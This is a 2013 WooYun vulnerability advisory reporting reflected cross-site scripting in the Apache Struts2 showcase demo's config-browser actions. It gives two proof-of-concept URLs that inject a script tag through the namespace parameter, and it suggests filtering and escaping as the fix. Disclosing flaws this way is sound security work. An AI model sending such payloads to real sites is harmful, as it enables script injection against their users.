Current:WooYun >> vulnerability information

Overview Followers (0) + Follow

WooYun-2013-00034

: Apache Struts2 showcase multiple XSS

The Apache Software Foundation

Nebula

: 2013-10-24 17:17

: 2013-10-24 17:17

: Xss(cross-site scripting) attack

: low

: 1

: unable to contact the vendor or actively neglected by the vendor

http://www.wooyun.org

: N/A

0collected by people collect


Details

Disclosure time-line:

2013-10-24: Contacting and waiting for the vendor to claim, details not opened to the public
2013-10-24: Vendor has neglected the vulnerability, details opened to the public

Abstract:

The latest version of the current official struts-2.3.15.3,struts2-showcase.war demo XSS still exist!

Details:

I found an update of the official demo of Strust2, so I did a test. It used to be able to filter, escape input and escape output, but why didn’t it escape this time?

Proofs of concept:

Two demo addresses’ namespacec parameters were not solved:



http://127.0.0.1:8080/struts2-07/config-browser/actionNames.action?namespace=<script>alert(/xss/);</script>



http://127.0.0.1:8080/struts2-07/config-browser/showConfig.action?namespace=<script>alert(/xss/);</script>&actionName=showcase



11.png



12.png

Solutions:

Filter and escape.

Copyright:Please repost with source Nebula@Wooyun


Response

Vendor comments:

Hazard rating:no response yet

Vulnerability Rank:0

Date confirmed:2013-10-24 17:17

Vendor response:

Latest status:

N/A


review the vulnerability:

Give your review of the vulnerability in order to reflect its value better. Reviews can include the subjectivity, complecity, as well as the scholar value of the information.

(0 comments):
You need to sign in to comment

Comments

Want to comment? Please sign in .